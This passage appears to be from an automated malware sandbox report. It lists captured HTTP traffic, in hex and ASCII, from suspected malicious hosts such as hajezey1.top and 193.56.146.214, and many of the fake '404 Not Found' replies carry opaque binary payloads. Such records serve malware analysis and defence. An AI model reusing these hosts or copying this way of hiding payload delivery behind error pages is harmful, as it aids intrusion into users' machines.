73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 7Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 03 00 00 00 1d 3d 5d Data Ascii: =]
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:01 GMTContent-Type: text/html; charset=utf-8Content-Length: 42Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 07 9b 01 c2 40 9c e2 0f b3 66 f5 26 0a 5b 22 f9 6a 00 7e c2 5d 31 0e Data Ascii: Uys/~(`:@f&["j~]1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:06 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 35 32 37 33 33 0d 0a b8 00 00 00 c7 1a b4 fa 05 54 a4 5f 28 1e c5 73 c8 bb 6f 2d ae 22 c0 a9 8f 89 bd 2a 1c 21 f8 64 eb 16 a1 85 cc be 11 ce 58 26 9a 05 1e 5c c6 c1 69 3a 30 5b 9b c4 28 c2 ef 63 ab b5 4a e8 89 6e 9c 3d f7 c6 fe 06 43 1d 42 b0 fa b9 17 9d bc 30 e1 7d b4 71 0c f3 55 ca a6 9d 45 22 ea 9d de 0a 6c 39 20 12 7c 4b 07 4c f2 97 87 24 3a c2 ff e2 61 c9 ff 82 3e 8d 64 f6 2c 24 84 19 bd fa 7b 18 4f ce fd ab 1c f3 bb 9d 70 2b 2b eb ec 0b b0 37 d1 d7 3d 24 bb 29 51 24 7c 4e e0 35 9d 11 e0 42 10 5e 4d 2f 68 41 22 93 01 8f 26 1e 4b e8 70 6a ed 03 43 fd b3 0a b8 09 cd 31 c3 31 00 76 26 05 00 99 e1 70 64 01 08 02 00 05 00 9c 03 00 00 8f 53 a0 cd 6b ff f3 42 ef be 5f a6 0b 12 1e 00 fa 2d 5f bc 60 48 43 c4 3f a0 d1 42 cb fe 22 d0 1e 94 d6 c5 1a 29 6e 08 cd c8 2d c7 4d 7e 61 df 49 1a 97 84 14 51 2c 4c e4 c5 d6 02 94 b8 c5 49 53 0d 5e 82 e6 83 ab 8e 62 c5 9d 46 0b a0 aa 3e c7 fd d6 bc a4 ad e8 3c 50 ba e0 3c fe e9 66 4d 4e a6 6b ea 3a 3d ce 29 2a 37 e9 6c 89 d6 f5 15 31 cc 37 72 61 7e 22 b0 24 77 36 7c 4e 6b 9a aa 32 ae ff ad 7d d1 69 71 5e 52 c5 cc 89 d6 bb fa 1e 30 d1 95 9d 4c 69 ee fe ef 04 01 d8 3e 1b 87 e4 46 c1 6e fb 21 19 c0 a0 dd 94 37 60 40 b8 71 82 cf 26 ba ba 93 8d d0 d2 c2 59 ae 5a 2b f1 dd f6 78 90 66 b1 4e ca f3 88 94 76 73 aa 67 95 39 13 f9 1a 7e db 59 b0 5a be ea a7 57 2c da 41 2f 3b 44 99 a6 d1 e3 ae 5d 44 1c 04 12 87 6b 36 97 f0 39 ba 17 30 82 22 5d 97 9c 25 f8 0f 01 a5 f3 47 51 4b c6 6c ab e9 ee 5b 16 36 f0 62 25 02 ed 05 a6 10 4e c2 e6 19 fe 62 4e c5 5b d6 25 26 c8 0b 8d ec 99 23 41 05 8c 38 bb 0c c3 e8 42 32 14 41 b7 83 9c af 9a 27 3e 5a 59 7c a3 5e ee 1c 9c 12 fc 53 8b e3 c9 3c 9d f9 b6 c4 e6 9f 86 54 45 f9 ea dc e7 d2 62 dd f4 b6 fc 61 49 d6 3d 2d fb 53 9e df 18 af 5e 30 3d 56 2a 0f 38 20 a4 
0d c3 98 c2 87 1d fd 7b 76 27 90 ad 0d f8 1c 82 12 74 be 06 e5 be c0 91 3d 8d d9 76 35 3a 86 ce 8b 57 89 6b 9e 6b 94 4b fe 6e 7b 84 16 f5 b4 5c b4 8f df 2a 68 2b 33 43 0b 6e 60 35 e6 3b 93 c5 fd e6 62 80 69 e2 92 79 02 9e 47 77 90 92 90 52 4f cf 29 e7 8b 19 b7 16 d5 1a 92 65 37 c9 26 3c 17 27 bd 55 08 ce c3 07 7a 53 f1 6f 43 0a 86 a0 32 60 f8 0d f1 24 e9 e4 c0 fb cd ae cb cb 6c 00 9c ef 2f 87 07 95 d6 a2 32 a9 f4 6b d7 2c e8 2c 27 c2 b7 00 ef 75 ec d5 58 86 2a ad a4 97 43 9a 52 8f 28 e9 1b ce e1 d3 d0 78 92 a0 ab 1e e0 dd 3d cc e0 5a 14 90 1d 7d 10 44 b2 b1 04 a8 db 37 c3 a1 bb 3b 1c f8 3e 56 ed 73 dd 7d b0 6b 95 36 fd 00 c5 00 b0 6f 9b 2b 71 fb 79 82 a6 e1 23 c2 b9 8a a8 89 62 ba 2d 12 c6 52 d3 b1 97 b5 64 20 e9 05 e7 b4 dd e7 89 3a 3b a5 25 ec 86 96 39 8e 21 04 ab 93 4a ec 81 e7 55 81 50 94 e0 5b 5b 40 17 8f ac 1e 17 68 a5 e6 f4 09 11 8f 34 77 8f dc 57 87 c9 7d d9 e7 6b 23 6c 4e d0 db 94 61 ae f2 5c 36 c5 15 c9 a7 a3 39 4b 2b 05 81 e2 8b cf fa 08 90 e8 55 0c 8b 78 14 91 04 c2 44 ed b6 c6 17 7c 82 6c 40 c6 ec b6 91 3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:07 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=99Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 39 33 38 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 1d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 85 a5 24 d1 ee 12 d7 a8 78 27 4c 76 46 ea d6 2c 43 64 1b 67 c4 62 1c 74 29 44 86 43 af 6f a0 68 8a 59 6d 82 4a a7 cf 1f c6 a3 13 69 4a 24 b3 ea 27 63 13 57 70 50 68 6a 3e e0 2f 7a 70 79 23 e3 d8 2f 09 13 72 9b be 7c 42 bf 19 de 6c dc 13 55 70 53 0a 46 17 7c e7 ba 3f dc 9e 2e c9 81 e8 ce 05 4c c4 c1 52 3a 54 6b ad 87 f9 07 87 d6 41 c9 b0 26 1c 94 30 99 7f 5b 92 2a 93 5b af a8 98 7a bd 0b e2 a4 22 3e 1a 20 cc cc b6 ca 21 af ad f5 31 a1 a3 cf 37 1f 5a eb 3f 5c c5 74 59 90 8f f5 06 b6 0e cd 9a df a5 61 69 fd 70 12 70 df ce 22 db e0 ab ab b6 2e 08 8f ff dd 4c 76 20 e1 ff 38 5c 3f 0f 83 d0 20 38 ba 60 bd 59 22 09 79 53 40 98 e3 94 54 f0 2f 60 43 8c 47 f0 86 f8 fb 34 6c 1f f1 69 d5 92 4e 76 8c 96 bd 4a 16 e9 37 a2 55 6b 5f c7 ae 4a 88 54 d9 4e 3d b6 7b 93 fe 88 2c 93 7e 87 12 75 d7 9a db 05 a9 46 75 18 c7 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 69 4f 44 88 fe 40 0a 5c 69 ba e8 33 74 16 00 89 12 1e 0d 63 bb 9c d4 46 d1 64 3b df d5 af 2b 02 57 d3 db 53 3d a0 c3 96 8b 7d 64 17 9a f7 3e c2 56 75 1b e2 95 15 f7 bb 2e 64 35 e2 26 2c 74 a4 34 54 05 91 5f ef 6c 05 23 8f f5 4a b0 de 7f 0d 6a f3 d8 90 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 92 d6 ea 8c 11 7d 72 d7 6a ab c1 39 e2 23 13 96 c4 66 d1 30 80 06 10 b2 9c 78 c6 58 43 f6 e7 2a 92 72 08 aa 14 21 52 ff f3 53 5d b5 78 3d f1 24 a0 e9 37 7f 3b 60 ff f1 ee 71 c0 b6 4f 4d bb 
75 4b 53 06 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 d3 03 e8 e9 32 2c 0d 90 db 4f f4 47 d3 1c 4c 93 19 c0 0d 04 7d 76 88 52 8c 2a 01 6e fe ca 39 52 41 cc 35 5f 27 89 98 4c 28 48 94 14 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 a1 95 87 04 7d 32 7d 42 02 42 39 ad d5 d3 3c 86 63 55 cd b7 fb 29 6d da 0a 1e d7 09 07 99 cb 23 5b c4 b5 b5 5f 7c a9 84 79 89 b1 39 ec 06 88 45 fa e6 58 a9 e6 e8 4f 67 2c 5e db 50 c7 95 e6 d8 99 0a e2 4c c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 76 ed f6 4b a5 53 52 d2 c5 d4 d1 79 5e 67 ad 6d 11 b0 c0 db 31 a0 29 77 31 ac b2 03 07 1e 17 76 28 bc db 58 67 4b 5b 67 c2 3f d3 78 d9 f8 1f ba e2 50 11 3b ec 5f e0 3c c7 4b d4 50 b0 20 e1 1e 34 ef d3 2e ac 9c d8 f7 0d c2 23 af 38 15 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 6c 1c 9d 89 05 4d 99 2e b4 58 13 86 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:07 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 57 2b 4d 9c 94 1b 7e 45 f7 ff 78 8d 55 db 24 0d 10 12 b4 1f eb 92 24 a6 4d c5 03 97 65 a3 61 7e de f5 36 9c 19 17 7e 4f af 9a a5 84 cb a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 31 70 48 9a 07 fd ec 3f 36 7f ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 c5 52 ce 4f 13 79 82 ae 9c f7 ad 4e 3d 79 ac f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 10 d3 fb 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 02 ed fd 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 44 40 40 07 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 40 22 b5 1b 6f d3 cb 29 32 86 e5 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5b 62 90 58 3f ae 03 5f a0 1f e4 a6 bd 12 9f 10 ff d9 b0 99 b5 9b 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 97 b2 ec a2 94 4a a9 b4 bb d1 
46 bb 2a d2 be 45 1f d0 b5 aa 7a 8f 0e 69 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a 56 63 b3 88 7d 3f dc e5 7e 3f a4 70 d4 03 bb 03 9a 76 6a 0f ca 82 c3 26 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 08 85 af 88 c1 a4 0e 31 25 4d db a9 c3 f8 cb 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:12 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=98Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:12 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=97Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 34 30 30 36 61 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 9c a2 ae 7a b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c af 3a 05 14 a5 5d ef 3b f3 56 72 bc 3d 1a 04 b2 50 2a 87 d6 17 8f 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 d8 9d 1d b3 9c 88 8a 38 22 7a 6d 2e e6 2a 7e d7 3f dc 9e 2e cb 81 a8 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a 95 5f 97 a6 75 3e 1a 20 8c a3 b0 ca 79 f7 ad f5 31 61 a4 cf 37 1f 1a eb 3f ae c6 74 31 8c 8f f5 03 96 0b cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c 3b 4c f9 10 e5 ec 9a db 25 2f 45 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 ec fd 05 89 52 de 0e 63 bb d6 d4 46 d1 f2 38 df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 31 e2 08 5a 11 dc 40 b4 06 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 5b ab 10 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 68 1e 11 b2 18 4c c1 58 40 f6 e7 2a 33 72 08 ac 78 ae 53 ff 0f 71 5f 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 
75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 1c 5e 68 fc b5 2c f4 47 1c 3f 4d 93 1e 60 70 06 72 52 89 52 93 3e 09 6e c1 ca 39 52 3e cc 35 5f d8 89 98 4c 97 49 94 56 ef 01 37 e2 41 44 f0 8b 65 48 8a 76 e1 41 84 8e 71 b4 0d 16 5e ea 87 04 82 cd 7d 42 fd bd 38 ad 2a 2c 3f 86 9c aa ca b7 04 d6 62 da f5 e1 c8 09 f8 66 f4 23 a4 3b ca b5 a0 83 56 84 86 76 4e 38 13 f9 77 46 05 19 a7 ae 19 17 b0 68 d3 a1 24 4f 38 6a 19 e7 66 f5 1d 33 c7 2a 09 c5 ed fc c4 23 ef 28 ef 3e 1c 2b 48 06 30 c8 0b 4c 27 c7 7d e6 c2 6a fd 20 23 71 de a1 9f 39 b0 fc f8 06 04 cd 0b dd 30 d5 71 cf d6 a3 96 5c 41 be c0 52 50 0f fb 75 d2 7a b6 d7 5b d4 77 ed f6 4b a5 53 52 d2 c7 d4 d1 79 5e 67 ad 6d 15 b0 c0 db 31 a0 29 77 39 ac b2 03 07 1e 17 76 38 bc db 58 67 4b 5b 67 e2 3f d3 78 d9 f8 1f ba a2 50 11 3b ec 5f e0 3c 47 4b d4 50 b0 20 e1 1e 34 ee d3 2e ac 9c d8 f7 0d c0 23 af 38 15 06 1f 84 48 7f 4f 6d 5b df 92 a0 cf 0b 80 51 a9 cd 6d e1 7c 1c 9d 89 05 4d 99 2e 94 58 13 86 89 b0 6e 2c dc c3 75 44 f4 8b 85 52 aa a2 e4 2f a9 e7 5b 9a 1e bd 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:12 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc 86 d5 36 8c f6 c7 35 f3 73 07 03 d2 ff f9 fa fa eb b2 b9 71 cd 79 33 33 d1 60 73 45 7c 1f 57 44 63 84 be 3c 50 15 51 fe 08 a2 b9 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed c5 70 b1 17 20 58 4a ed 08 63 3e 17 21 6b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff e4 e1 55 db 8b 0d 13 13 bf 9e e1 92 08 0c 4f c5 03 a1 cb a1 61 7e de f5 69 e1 19 17 c6 4c af 9a a5 e4 c9 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 a3 77 2a b9 72 ce cc 23 b2 3b 0e 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f 1f cd cc 46 d9 c8 15 ac af ed d9 55 3d ff ba 68 92 0e 